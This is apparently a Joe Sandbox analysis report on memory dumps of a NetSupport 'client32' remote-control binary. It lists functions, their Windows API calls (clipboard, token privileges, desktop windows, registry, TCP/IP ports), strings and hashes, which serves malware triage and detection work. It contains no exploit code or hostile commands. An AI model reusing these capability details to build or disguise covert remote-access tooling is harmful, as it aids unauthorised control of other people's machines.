Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _free$CloseErrorExitFolderHandleLastMessageNamePathProcessUser__strdup_fgetswsprintf
String ID: 8zi$IsA()$P$\Rewards.bin$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
API String ID: 2727059318-2211427333
Opcode ID: d93e098598c779350e02c725906b2d4f341d1f1b7fdefcb6a6582428ed068d5d
Instruction ID: e3a00869204f91199372c05b0601f5e67f7f5edfd565adcc48e9df29b2870661
Opcode Fuzzy Hash: d93e098598c779350e02c725906b2d4f341d1f1b7fdefcb6a6582428ed068d5d
Instruction Fuzzy Hash: E0717D75D4062A9FDB10DBA4CC84FEEB7B8AF49308F0442D9D519A7284EB71AE44CF90

Function 11033050 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 183clipboardCOMMON

Download Yara Rule

APIs

CountClipboardFormats.USER32 ref: 11033091

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Part of subcall function 11110230: _malloc.LIBCMT ref: 11110239
Part of subcall function 11110230: _memset.LIBCMT ref: 11110262

EnumClipboardFormats.USER32(00000000), ref: 110330F6
GetLastError.KERNEL32 ref: 110331BF
GetLastError.KERNEL32(00000000), ref: 110331C2
IsClipboardFormatAvailable.USER32(00000008), ref: 11033225

Strings

..\ctl32\clipbrd.cpp, xrefs: 1103307B
Error enumclip, e=%d, x%x, xrefs: 110331C5
ppFormats, xrefs: 11033080

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ClipboardErrorLast$Formats$AvailableCountEnumExitFormatMessageProcess_malloc_memsetwsprintf
String ID: ..\ctl32\clipbrd.cpp$Error enumclip, e=%d, x%x$ppFormats
API String ID: 3210887762-597690070
Opcode ID: 1ff6cce5a3e98d59990bfc89cbde72bb65ec7281a2cbf4e7471b8b57d3eaa7bb
Instruction ID: b804fa4b4600a3d7d633b164336aeb5b10f9113d5bb37ecf981567cf99ca6661
Opcode Fuzzy Hash: 1ff6cce5a3e98d59990bfc89cbde72bb65ec7281a2cbf4e7471b8b57d3eaa7bb
Instruction Fuzzy Hash: 02518B75E1822A8FDB10CFA8C8C479DFBB4EB85319F1041AAD859AB341EB719944CF90

Function 11053590 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 162COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(111EE294,B6DE5DE1,?,?,?,?,00000000,11181BDE), ref: 110535C4
LeaveCriticalSection.KERNEL32(111EE294,00000000,?,?,?,?,00000000,11181BDE), ref: 11053789

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

std::exception::exception.LIBCMT ref: 11053635
__CxxThrowException@8.LIBCMT ref: 1105364A
GetTickCount.KERNEL32 ref: 11053660
std::_Xinvalid_argument.LIBCPMT ref: 11053747
LeaveCriticalSection.KERNEL32(111EE294,list<T> too long,00000000,?,?,?,?,00000000,11181BDE), ref: 11053751

Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D

Strings

list<T> too long, xrefs: 11053742
IsA(), xrefs: 11053680
e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1105367B

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$CountEnterException@8ThrowTickXinvalid_argument_free_malloc_memsetstd::_std::exception::exceptionwsprintf
String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$list<T> too long
API String ID: 2238969640-1197860701
Opcode ID: 32aba6b56445e375281309d35a63f918232d7fd92285781ec041856fab574bfe
Instruction ID: 9fd56e3a4776fcf28e1c6ce8a1981ca07dec16432dee4cc0167aa7d7c32ba94c
Opcode Fuzzy Hash: 32aba6b56445e375281309d35a63f918232d7fd92285781ec041856fab574bfe
Instruction Fuzzy Hash: 31517179E062659FDB45CFA4C984AADFBA4FF09348F008169E8159B344F731A904CBA5

Function 11027D00 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 89COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?,00000000), ref: 11027D1F
OpenProcessToken.ADVAPI32(00000000), ref: 11027D26
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,00000000,?,00000000,?), ref: 11027D48
_malloc.LIBCMT ref: 11027D4E

Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?), ref: 11027D68
LookupPrivilegeNameA.ADVAPI32(00000000,00000004,?,?), ref: 11027D89
_free.LIBCMT ref: 11027DB4
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110300C2), ref: 11027DC6

Strings

@, xrefs: 11027D7E
Luid Low=%x, High=%x, Attr=%x, name=%s, xrefs: 11027D9E

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Token$InformationProcess$AllocateCloseCurrentHandleHeapLookupNameOpenPrivilege_free_malloc
String ID: @$Luid Low=%x, High=%x, Attr=%x, name=%s
API String ID: 2190874299-3275751932
Opcode ID: df048cdd4628f306115ccc3be56e8cd91a40ed9f77398ebb8bc9da76acf1ea06
Instruction ID: 296b0204b1577650e81660c46f31069356c420c8454e735c68e4cb8c3b23b951
Opcode Fuzzy Hash: df048cdd4628f306115ccc3be56e8cd91a40ed9f77398ebb8bc9da76acf1ea06
Instruction Fuzzy Hash: 1A2182B6D00219ABDB10DFE4CC84EEFBBBCEF54708F104129E919A7240D771A906CBA1

Function 110654E0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 80COMMON

Download Yara Rule

APIs

Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D

GetOEMCP.KERNEL32(View,Cachesize,00000400,00000000,76EEC3F0,00000000), ref: 11065525

Part of subcall function 11064880: _strtok.LIBCMT ref: 110648C0
Part of subcall function 11064880: _strtok.LIBCMT ref: 110648F0

GetDC.USER32(00000000), ref: 11065558
GetDeviceCaps.GDI32(00000000,0000000E), ref: 11065563
GetDeviceCaps.GDI32(00000000,0000000C), ref: 1106556E
ReleaseDC.USER32(00000000,00000000), ref: 110655B9

Strings

Codepage, xrefs: 11065530
View, xrefs: 1106550A
932, 949, 1361, 874, 862, xrefs: 1106552B
Cachesize, xrefs: 11065505
DBCS, xrefs: 11065535

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CapsDevice_strtok$Release__wcstoi64
String ID: 932, 949, 1361, 874, 862$Cachesize$Codepage$DBCS$View
API String ID: 3945178471-2526036698
Opcode ID: 058c2aae16d643b31adc47a1744bed462daca89727d2630be5973e582d58aa57
Instruction ID: 682317bc02e2a30c69588dc0a9c96f0ce4cbb9861371b6ad8b8e837dbdf19ace
Opcode Fuzzy Hash: 058c2aae16d643b31adc47a1744bed462daca89727d2630be5973e582d58aa57
Instruction Fuzzy Hash: DA21497AE002246BE3149F75CDC4BA9FB98FB08354F014565F969EB280D775A940C7D0

Function 1101F2A0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 70windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32 ref: 1101F2B5
_memset.LIBCMT ref: 1101F2D8
GetMenuItemInfoA.USER32(?,00000000,00000001,?), ref: 1101F2F6
_free.LIBCMT ref: 1101F305

Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD

_free.LIBCMT ref: 1101F30E
DeleteObject.GDI32(00000000), ref: 1101F32D
DeleteObject.GDI32(00000000), ref: 1101F33B

Strings

UndoOwnerDraw, xrefs: 1101F2A7
0, xrefs: 1101F2E8
, xrefs: 1101F2EF

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: DeleteItemMenuObject_free$CountErrorFreeHeapInfoLast_memset
String ID: $0$UndoOwnerDraw
API String ID: 4094458939-790594647
Opcode ID: 6ed4e77d9c016c8eff6e2e5212ae31cf16a08a19f327eae3f04c88df89f206e5
Instruction ID: 9f4c9540ed3e85911a06978235dbefa5e19a2329fc37d196683f21109e2371eb
Opcode Fuzzy Hash: 6ed4e77d9c016c8eff6e2e5212ae31cf16a08a19f327eae3f04c88df89f206e5
Instruction Fuzzy Hash: 16119671E162299BDB04DFE49C85B9DFBECBB18318F000069E814D7244E674A5108B91

Function 1106F400 Relevance: 16.8, APIs: 3, Strings: 8, Instructions: 297COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 1106F737
EnterCriticalSection.KERNEL32(?,?,?,?,?,?), ref: 1106F788
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?), ref: 1106F7A8

Strings

%s:%d, xrefs: 1106F731
NameResp from %s(%s), len=%d/%d, flags=%d, channel=%s, xrefs: 1106F5A0
tracerecv, xrefs: 1106F565
Port, xrefs: 1106F6F3
UseNCS, xrefs: 1106F692
TCPIP, xrefs: 1106F56A, 1106F697, 1106F6F8, 1106F715
ListenPort, xrefs: 1106F710
(null), xrefs: 1106F57E, 1106F590

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeavewsprintf
String ID: %s:%d$(null)$ListenPort$NameResp from %s(%s), len=%d/%d, flags=%d, channel=%s$Port$TCPIP$UseNCS$tracerecv
API String ID: 3005300677-3496508882
Opcode ID: 3ffad59956a6d71c8e7aed06dad8b2fdbceca025d9acfd893461f19a63c6c477
Instruction ID: f86a0a3523b45ae2aa4ac8696085f91b0c00e2f9513f1a57450127c273c63767
Opcode Fuzzy Hash: 3ffad59956a6d71c8e7aed06dad8b2fdbceca025d9acfd893461f19a63c6c477
Instruction Fuzzy Hash: 17B19F79E003169FDB10CF64CC90FAAB7B9AF89708F50419DE909A7241EB75AD41CF62

Function 11047AE0 Relevance: 16.1, APIs: 5, Strings: 4, Instructions: 330windowtimeCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 11047B91
_malloc.LIBCMT ref: 11047C2D
_memmove.LIBCMT ref: 11047C92
SendMessageTimeoutA.USER32(?,0000004A,00000000,00000005,00000002,00002710,?), ref: 11047CF2
_free.LIBCMT ref: 11047CF9

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Part of subcall function 110441F0: _free.LIBCMT ref: 11044287
Part of subcall function 110441F0: _free.LIBCMT ref: 110442A7
Part of subcall function 110441F0: _strncpy.LIBCMT ref: 110442D5
Part of subcall function 110441F0: _strncpy.LIBCMT ref: 11044312
Part of subcall function 110441F0: _malloc.LIBCMT ref: 1104434C

Strings

IsA(), xrefs: 11047C1C, 11047C53, 11047C7F, 11047CBD
8zi, xrefs: 11047D24, 11047DAB, 11047EBF
e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h, xrefs: 11047C17, 11047C4E, 11047C7A, 11047CB8
SurveyResults, xrefs: 11047E65

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _free$Message_malloc_strncpy$ErrorExitLastProcessSendTimeoutWindow_memmovewsprintf
String ID: 8zi$IsA()$SurveyResults$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
API String ID: 3960737985-3480222789
Opcode ID: 561dbc326cf2bbfe5674f923ccb3c0af0559503d88a4e88e35c474c5adf207d7
Instruction ID: 0b477fbc92d831519da0ee770f36e3f26d6d71f723aedfd13b028ee92d4612f4
Opcode Fuzzy Hash: 561dbc326cf2bbfe5674f923ccb3c0af0559503d88a4e88e35c474c5adf207d7
Instruction Fuzzy Hash: A2C18075E0060A9FDB04DFE4C8C0EEEF7B5BF89308F20466CD516A7694EA70A945CB91

Function 11061320 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 289registryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,11180365,00000000,00000000,B6DE5DE1,00000000,?,00000000), ref: 110613A4
_malloc.LIBCMT ref: 110613EB

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

RegEnumValueA.ADVAPI32(?,?,?,00000000,00000000,00000000,000000FF,?,B6DE5DE1,00000000), ref: 1106142B
RegEnumValueA.ADVAPI32(?,00000000,?,00000100,00000000,?,000000FF,?), ref: 11061492
_free.LIBCMT ref: 110614A4

Strings

maxname < _tsizeof (m_szSectionAndKey), xrefs: 110613D8
strlen (k.m_k) < _tsizeof (m_szSectionAndKey), xrefs: 110615AA
err == 0, xrefs: 110613B8
..\ctl32\Config.cpp, xrefs: 110613B3, 110613D3, 110615A5

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: EnumValue$ErrorExitInfoLastMessageProcessQuery_free_mallocwsprintf
String ID: ..\ctl32\Config.cpp$err == 0$maxname < _tsizeof (m_szSectionAndKey)$strlen (k.m_k) < _tsizeof (m_szSectionAndKey)
API String ID: 999355418-161875503
Opcode ID: c88c5497aaf0b71f7d616666734417a077c2241501ec168b0270ea83746a62af
Instruction ID: 6cc8e5caf6a1957f468abfb3494a260dc46a483def11051c8948769c459486e3
Opcode Fuzzy Hash: c88c5497aaf0b71f7d616666734417a077c2241501ec168b0270ea83746a62af
Instruction Fuzzy Hash: 78A1A175A007469FE721CF64C880BABFBF8AF49304F144A5DE59697680E771F508CBA1

Function 11041819 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 212windowtimeCOMMON

Download Yara Rule

APIs

OpenDesktopA.USER32(Default,00000000,00000000,00000041), ref: 110418C9
EnumDesktopWindows.USER32(00000000,110416A0,?), ref: 110418E7
CloseDesktop.USER32(00000000), ref: 110418EE
_malloc.LIBCMT ref: 11041975
_memmove.LIBCMT ref: 11041992
SendMessageTimeoutA.USER32(?,0000004A,00000000,00000687,00000002,00002710,?), ref: 110419CE
GetLastError.KERNEL32 ref: 110419D4
_free.LIBCMT ref: 110419DB

Strings

Default, xrefs: 110418C4

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Desktop$CloseEnumErrorLastMessageOpenSendTimeoutWindows_free_malloc_memmove
String ID: Default
API String ID: 3929658058-753088835
Opcode ID: 3dbace7f646c4ff5d7869bc149588a4c28d02eaa0a116e5d791ab01bd5eba4a5
Instruction ID: 94dc91b5f1fbba39de12b0909dd61bd683e540376cc711f311f43105c9ee296a
Opcode Fuzzy Hash: 3dbace7f646c4ff5d7869bc149588a4c28d02eaa0a116e5d791ab01bd5eba4a5
Instruction Fuzzy Hash: 80717075E0021A9FDB04DFE4C8809EEF7B9FF48304F108569E516A7244EB74BA45CB90

Function 11041440 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 211windowtimeCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 1104147B

Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D

SendMessageTimeoutA.USER32(?,0000004A,00000000,?,00000002,00002710,?), ref: 11041670
_free.LIBCMT ref: 11041677

Strings

IsA(), xrefs: 110415D7, 11041603, 1104163E
Client, xrefs: 110414A1
SendJournalStatustoSTUI(%d, %d, %d, %d), xrefs: 110415AE
DisableJournalMenu, xrefs: 1104149C
e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h, xrefs: 110415D2, 110415FE, 11041639
Journal status( bNoMenu = %d, gpJournal = %x, %d, %d) bVistaUI %d, xrefs: 110414E9

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

